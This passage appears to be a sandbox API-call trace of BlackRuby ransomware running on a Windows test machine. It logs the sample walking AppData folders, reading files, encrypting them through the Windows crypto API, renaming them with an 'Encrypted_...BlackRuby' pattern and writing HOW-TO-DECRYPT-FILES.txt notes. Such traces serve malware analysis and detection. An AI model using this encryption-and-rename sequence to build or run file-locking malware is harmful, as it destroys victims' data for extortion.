returned 0x1 [0048.897] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.897] GetLastError () returned 0x5 [0048.898] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\ntuser.ini" (normalized: "c:\\users\\eebsym5\\ntuser.ini"), fInfoLevelId=0x0, lpFileInformation=0x1cf1b40 | out: lpFileInformation=0x1cf1b40*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x8e4c770, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8e4c770, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x19e18206, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x14)) returned 1 [0048.898] GetLastError () returned 0x5 [0048.898] SetErrorMode (uMode=0x0) returned 0x1 [0048.898] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.898] GetLastError () returned 0x5 [0048.899] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.899] GetLastError () returned 0x5 [0048.899] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.899] GetLastError () returned 0x5 [0048.899] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.899] GetLastError () returned 0x5 [0048.899] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.899] GetLastError () returned 0x5 [0048.899] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.899] GetLastError () returned 0x5 [0048.899] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.899] GetLastError () returned 0x12 [0048.899] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.899] SetErrorMode (uMode=0x0) returned 0x1 [0048.899] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.899] GetLastError () returned 0x12 [0048.899] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.899] GetLastError () returned 0x12 [0048.899] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.899] GetLastError () returned 0x12 [0048.899] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.899] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.900] GetLastError () returned 0x12 [0048.900] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.900] SetErrorMode (uMode=0x0) returned 0x1 [0048.900] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.900] GetLastError () returned 0x12 [0048.900] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.900] GetLastError () returned 0x12 [0048.900] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.900] SetErrorMode (uMode=0x0) returned 0x1 [0048.901] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.901] GetLastError () returned 0x12 [0048.901] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.901] GetLastError () returned 0x12 [0048.901] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.901] GetLastError () returned 0x12 [0048.901] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.901] GetLastError () returned 0x12 [0048.901] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.901] GetLastError () returned 0x12 [0048.901] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.901] GetLastError () returned 0x12 [0048.901] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.901] GetLastError () returned 0x12 [0048.901] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.901] GetLastError () returned 0x12 [0048.901] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.901] GetLastError () returned 0x12 [0048.901] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.901] GetLastError () returned 0x12 [0048.901] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.901] GetLastError () returned 0x12 [0048.901] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.901] GetLastError () returned 0x12 [0048.901] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.901] GetLastError () returned 0x12 [0048.901] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.901] GetLastError () returned 0x12 [0048.901] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.901] GetLastError () returned 0x12 [0048.901] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.901] SetErrorMode (uMode=0x0) returned 0x1 [0048.901] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\eebsym5\\appdata\\local\\gdipfontcachev1.dat"), fInfoLevelId=0x0, lpFileInformation=0x1d12b50 | out: lpFileInformation=0x1d12b50*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb7756010, ftCreationTime.dwHighDateTime=0x1d2f5bb, ftLastAccessTime.dwLowDateTime=0xb7756010, ftLastAccessTime.dwHighDateTime=0x1d2f5bb, ftLastWriteTime.dwLowDateTime=0xb7756010, ftLastWriteTime.dwHighDateTime=0x1d2f5bb, nFileSizeHigh=0x0, nFileSizeLow=0x1a918)) returned 1 [0048.902] GetLastError () returned 0x12 [0048.902] SetErrorMode (uMode=0x0) returned 0x1 [0048.902] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\eebsym5\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.902] GetLastError () returned 0x0 [0048.902] GetFileType (hFile=0x184) returned 0x1 [0048.902] SetErrorMode (uMode=0x0) returned 0x1 [0048.902] GetFileType (hFile=0x184) returned 0x1 [0048.902] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x1a918 [0048.902] GetLastError () returned 0x0 [0048.903] ReadFile (in: hFile=0x184, lpBuffer=0x2cdfaa0, nNumberOfBytesToRead=0x1a918, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2cdfaa0*, lpNumberOfBytesRead=0x18ed18*=0x1a918, lpOverlapped=0x0) returned 1 [0048.909] GetLastError () returned 0x0 [0048.909] CloseHandle (hObject=0x184) returned 1 [0048.909] GetLastError () returned 0x0 [0048.910] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\eebsym5\\appdata\\local\\gdipfontcachev1.dat"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb7756010, ftCreationTime.dwHighDateTime=0x1d2f5bb, ftLastAccessTime.dwLowDateTime=0xb7756010, ftLastAccessTime.dwHighDateTime=0x1d2f5bb, ftLastWriteTime.dwLowDateTime=0xb7756010, ftLastWriteTime.dwHighDateTime=0x1d2f5bb, nFileSizeHigh=0x0, nFileSizeLow=0x1a918)) returned 1 [0048.910] GetLastError () returned 0x0 [0048.910] SetErrorMode (uMode=0x0) returned 0x1 [0048.910] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c708) returned 1 [0048.910] GetLastError () returned 0x0 [0048.941] CryptImportKey (in: hProv=0x37c708, pbData=0x1b70ea0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ae0) returned 1 [0048.941] GetLastError () returned 0x0 [0048.941] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.941] GetLastError () returned 0x0 [0048.947] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.947] GetLastError () returned 0x0 [0048.947] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360a20) returned 1 [0048.947] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.947] GetLastError () returned 0x0 [0048.947] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1b9deec*=0x1, dwFlags=0x0) returned 1 [0048.947] GetLastError () returned 0x0 [0048.947] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1b9deb8, dwFlags=0x0) returned 1 [0048.947] GetLastError () returned 0x0 [0048.948] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d14e10*, pdwDataLen=0x18ed08*=0x1aa10, dwBufLen=0x1aa10 | out: pbData=0x2d14e10*, pdwDataLen=0x18ed08*=0x1aa10) returned 1 [0048.949] GetLastError () returned 0x0 [0048.950] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b9df48*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1b9df48*, pdwDataLen=0x18ed20*=0x10) returned 1 [0048.950] GetLastError () returned 0x0 [0048.950] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b9df78*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1b9df78*, pdwDataLen=0x18ed28*=0x10) returned 1 [0048.950] GetLastError () returned 0x0 [0048.952] CryptDestroyKey (hKey=0x360ae0) returned 1 [0048.952] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.952] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.952] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x32 [0048.952] GetLastError () returned 0x0 [0048.952] SetErrorMode (uMode=0x1) returned 0x0 [0048.952] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\eebsym5\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.953] GetLastError () returned 0xb7 [0048.953] GetFileType (hFile=0x184) returned 0x1 [0048.953] SetErrorMode (uMode=0x0) returned 0x1 [0048.954] GetFileType (hFile=0x184) returned 0x1 [0048.956] CloseHandle (hObject=0x184) returned 1 [0048.956] GetLastError () returned 0xb7 [0048.956] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x32 [0048.956] GetLastError () returned 0xb7 [0048.956] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Encrypted_FIvEXcP5RgjHSu3gDzUmi1PnhNOlonfRvQy0AC804Hv8T6.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Encrypted_FIvEXcP5RgjHSu3gDzUmi1PnhNOlonfRvQy0AC804Hv8T6.BlackRuby", lpFilePart=0x0) returned 0x61 [0048.956] GetLastError () returned 0xb7 [0048.956] SetErrorMode (uMode=0x1) returned 0x0 [0048.956] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\eebsym5\\appdata\\local\\gdipfontcachev1.dat"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb7756010, ftCreationTime.dwHighDateTime=0x1d2f5bb, ftLastAccessTime.dwLowDateTime=0xb7756010, ftLastAccessTime.dwHighDateTime=0x1d2f5bb, ftLastWriteTime.dwLowDateTime=0x25632d80, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x1aa20)) returned 1 [0048.956] GetLastError () returned 0xb7 [0048.956] SetErrorMode (uMode=0x0) returned 0x1 [0048.956] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\eebsym5\\appdata\\local\\gdipfontcachev1.dat"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Encrypted_FIvEXcP5RgjHSu3gDzUmi1PnhNOlonfRvQy0AC804Hv8T6.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\local\\encrypted_fivexcp5rgjhsu3gdzumi1pnhnolonfrvqy0ac804hv8t6.blackruby")) returned 1 [0048.957] GetLastError () returned 0xb7 [0048.957] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x37 [0048.957] GetLastError () returned 0xb7 [0048.957] SetErrorMode (uMode=0x1) returned 0x0 [0048.957] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.958] GetLastError () returned 0x0 [0048.958] GetFileType (hFile=0x184) returned 0x1 [0048.958] SetErrorMode (uMode=0x0) returned 0x1 [0048.958] GetFileType (hFile=0x184) returned 0x1 [0048.959] CloseHandle (hObject=0x184) returned 1 [0048.959] GetLastError () returned 0x0 [0048.959] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x37 [0048.959] GetLastError () returned 0x0 [0048.959] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.959] GetLastError () returned 0x0 [0048.960] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0048.960] GetLastError () returned 0x0 [0048.960] SetErrorMode (uMode=0x1) returned 0x0 [0048.960] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\iconcache.db"), fInfoLevelId=0x0, lpFileInformation=0x1bbad80 | out: lpFileInformation=0x1bbad80*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x90d3ed0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x90d3ed0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xb1453ce0, ftLastWriteTime.dwHighDateTime=0x1d35a62, nFileSizeHigh=0x0, nFileSizeLow=0x1464cd)) returned 1 [0048.960] GetLastError () returned 0x0 [0048.960] SetErrorMode (uMode=0x0) returned 0x1 [0048.960] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0048.960] GetLastError () returned 0x0 [0048.960] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0048.960] GetLastError () returned 0x0 [0048.960] SetErrorMode (uMode=0x1) returned 0x0 [0048.960] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\iconcache.db"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.960] GetLastError () returned 0x0 [0048.960] GetFileType (hFile=0x184) returned 0x1 [0048.960] SetErrorMode (uMode=0x0) returned 0x1 [0048.960] GetFileType (hFile=0x184) returned 0x1 [0048.960] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x1464cd [0048.960] GetLastError () returned 0x0 [0048.965] ReadFile (in: hFile=0x184, lpBuffer=0x2d9a0f0, nNumberOfBytesToRead=0x1464cd, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2d9a0f0*, lpNumberOfBytesRead=0x18ed18*=0x1464cd, lpOverlapped=0x0) returned 1 [0048.981] GetLastError () returned 0x0 [0048.981] CloseHandle (hObject=0x184) returned 1 [0048.982] GetLastError () returned 0x0 [0048.994] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0048.994] GetLastError () returned 0x0 [0048.995] SetErrorMode (uMode=0x1) returned 0x0 [0048.995] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\iconcache.db"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x90d3ed0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x90d3ed0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xb1453ce0, ftLastWriteTime.dwHighDateTime=0x1d35a62, nFileSizeHigh=0x0, nFileSizeLow=0x1464cd)) returned 1 [0048.995] GetLastError () returned 0x0 [0048.995] SetErrorMode (uMode=0x0) returned 0x1 [0048.995] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x18e8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0048.995] GetLastError () returned 0x0 [0048.995] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", dwFileAttributes=0x2020) returned 1 [0048.995] GetLastError () returned 0x0 [0048.995] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c790) returned 1 [0048.995] GetLastError () returned 0x0 [0049.029] CryptImportKey (in: hProv=0x37c790, pbData=0x1c16e5c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360e20) returned 1 [0049.029] GetLastError () returned 0x0 [0049.029] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.029] GetLastError () returned 0x0 [0049.034] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.034] GetLastError () returned 0x0 [0049.034] CryptDuplicateKey (in: hKey=0x360e20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360d20) returned 1 [0049.034] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.034] GetLastError () returned 0x0 [0049.034] CryptSetKeyParam (hKey=0x360d20, dwParam=0x4, pbData=0x1c43ea8*=0x1, dwFlags=0x0) returned 1 [0049.034] GetLastError () returned 0x0 [0049.034] CryptSetKeyParam (hKey=0x360d20, dwParam=0x1, pbData=0x1c43e74, dwFlags=0x0) returned 1 [0049.034] GetLastError () returned 0x0 [0049.055] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c008d0*, pdwDataLen=0x18ed08*=0x1465c0, dwBufLen=0x1465c0 | out: pbData=0x2c008d0*, pdwDataLen=0x18ed08*=0x1465c0) returned 1 [0049.064] GetLastError () returned 0x0 [0049.069] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b229c8*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1b229c8*, pdwDataLen=0x18ed20*=0x10) returned 1 [0049.069] GetLastError () returned 0x0 [0049.069] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b229f8*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1b229f8*, pdwDataLen=0x18ed28*=0x10) returned 1 [0049.069] GetLastError () returned 0x0 [0049.097] CryptDestroyKey (hKey=0x360e20) returned 1 [0049.097] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.097] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.097] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0049.097] GetLastError () returned 0x0 [0049.097] SetErrorMode (uMode=0x1) returned 0x0 [0049.097] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\iconcache.db"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.100] GetLastError () returned 0xb7 [0049.100] GetFileType (hFile=0x184) returned 0x1 [0049.100] SetErrorMode (uMode=0x0) returned 0x1 [0049.101] GetFileType (hFile=0x184) returned 0x1 [0049.121] CloseHandle (hObject=0x184) returned 1 [0049.121] GetLastError () returned 0xb7 [0049.121] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0049.121] GetLastError () returned 0xb7 [0049.121] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Encrypted_RdADiPVjJM9uiJlkffV2vT5sagotkhzMT5fVPo.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Encrypted_RdADiPVjJM9uiJlkffV2vT5sagotkhzMT5fVPo.BlackRuby", lpFilePart=0x0) returned 0x59 [0049.121] GetLastError () returned 0xb7 [0049.121] SetErrorMode (uMode=0x1) returned 0x0 [0049.121] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\iconcache.db"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, 